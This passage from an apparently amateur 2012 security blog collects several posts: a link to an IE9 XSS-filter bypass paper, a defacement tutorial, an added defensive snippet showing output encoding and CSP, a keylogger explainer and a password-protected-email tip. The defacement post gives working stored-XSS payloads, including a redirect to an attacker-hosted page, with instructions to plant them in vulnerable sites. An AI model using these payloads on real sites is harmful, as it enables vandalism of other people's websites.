Tuesday 31 January 2012

How to bypass Internet Explorer's XSS filter

Last night I was going through some security papers and found a nice research paper on bypassing Internet Explorer's XSS filter. By default, Internet Explorer 9 has a security system to help prevent reflective XSS attacks.
There are well-known shortfalls of this system, most notably that it does not attempt to address DOM-based XSS or stored XSS. This security system is built on an arbitrary philosophy which only accounts for the most straightforward of reflective XSS attacks[1]. The paper covers three attack patterns that undermine Internet Explorer's ability to prevent reflective XSS. These are general attack patterns that are independent of the web application platform.


Read here 
https://sitewat.ch/files/Bypassing%20Internet%20Explorer%27s%20XSS%20Filter.pdf

How to deface a website with Cross-Site Scripting?

Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing means replacing the website's content with the hacker's own content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it's a bad idea!




Script for changing the background color of a website:
<script>document.body.bgColor="red";</script>


Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement page with Pastehtml:
First of all, upload a defacement page (HTML) to pastehtml.com and get the link.

When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only sites that are vulnerable to persistent XSS.
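
For a site owner, the note above is the important part: a stored payload is served back by the site itself, so the fix belongs in how saved content is rendered. The following is an added example, not code from the original post; the function names and sample comments are hypothetical. It encodes stored content at output time so the scripts quoted above come out as inert text, and pairs that with a Content-Security-Policy that refuses inline script.

```javascript
// Added example: output encoding for stored user content, plus CSP as a second layer.
// escapeHtml, renderComment, renderAll and securityHeaders are hypothetical names.

// Characters that can break out of an HTML text node or a quoted attribute value.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one stored comment. Every user-controlled field is encoded when it is
// written into the page, both in the attribute and in the element body.
function renderComment(comment) {
  return '<div class="comment" data-author="' + escapeHtml(comment.author) + '">' +
         "<p>" + escapeHtml(comment.body) + "</p></div>";
}

function renderAll(comments) {
  return comments.map(renderComment).join("\n");
}

// Response headers for pages that show user content. Without 'unsafe-inline',
// an injected <script> element is not executed even if an encoding step is missed.
function securityHeaders() {
  return {
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed sample data: stored comments carrying the scripts quoted in this post.
const storedComments = [
  { author: "alice", body: "Nice article & thanks!" },
  { author: "mallory", body: '<script>document.body.bgColor="red";</script>' },
  { author: '<script>document.body.background="http://your_image.jpg";</script>',
    body: '<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>' },
];

console.log(renderAll(storedComments));
console.log(securityHeaders());
```
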

Monday 30 January 2012

What is Keylogger?


As with anything else, to be able to detect something and know how to prevent it, you must be aware of how it works. A keylogger is a software program that tracks your online activity and keystrokes. This software is used by thieves to access your accounts.

How does a keylogger work?

You won't even notice that your computer slows down. A keylogger works just like a thief in the night. It records your keystrokes and all the information you type. Keyloggers are usually used by companies to record their employees' activities, or at home when parents want to monitor their kids' computer activities. However, when keyloggers are used by hackers, their intention is to manipulate your account and use it for their personal interest. This is extremely dangerous.
When another party accesses your account, all the information can be used without your actual consent. This can be dangerous, as it means they can transfer, purchase and transact on your behalf. Even worse, they can manipulate all of your accounts, such as websites, social accounts, etc. And for some, retrieving them can be very difficult.

What you need to know about keylogger

There are 2 types of keyloggers: software-based keyloggers and hardware-based keyloggers. Software-based keyloggers are programs designed to work on the computer's operating system, while hardware-based keyloggers do not need software, as they sit at the hardware level of your computer system.

How To Protect Your Computer From Keylogger

Now that you know the risks of being a victim of a keylogger, the next question is: is there a way to avoid it? The answer is yes!
You can opt for one or more of the following:
  • Use anti-keylogger software. This software works by detecting keyloggers on your computer.
  • Use a live CD/USB. You can reboot your computer with the use of a live CD or USB (the USB must be write-protected). Booting a different operating system does not affect a hardware- or BIOS-based keylogger.
  • Use anti-spyware and anti-virus programs. It is important that you update them regularly.
  • Use RoboForm or any automatic form filler. This will lessen the need for you to type details and passwords using the keyboard.
  • Use a firewall to help stop unauthorized computer activities.
  • Avoid opening email attachments from unknown sources.
  • Avoid using public computers to access your online accounts.
  • Run a weekly scan of your computers.
Remember that there is no particular software or technique that will be 100% effective against all kinds of keyloggers. You can protect yourself by being extra careful when opening websites and downloading applications. You are better protected from becoming a keylogger victim when you know you have to be extra careful.

Thursday 26 January 2012

How to send password protected Email

 
Nowadays, email is the most common medium for information interchange. It is used by most working people. Most of the popular email providers, such as Gmail, Yahoo Mail, Hotmail and many others, provide this email service for free. Users need to create a free account, and then they can use their account for sending and receiving emails.



But cyber criminals are always trying to hack the passwords of users' email accounts to read emails and misuse the accounts. Did you know that you can also protect each mail you send with a password for better information security? If someone managed to get into the account, he would not be able to read the email without knowing the password. To send a password-protected email, you have to use a third-party service named LockBin.
  • Go to the link http://www.lockbin.com/lockbin.php
  • Fill in the form and send the mail. Also inform the receiver that you have sent the mail, and tell him the password as well.
  • The recipient will get an email with a link. To read the email, he will have to go to the link and verify the password which you entered while sending the email.
  • After submitting the password, the receiver can view the message.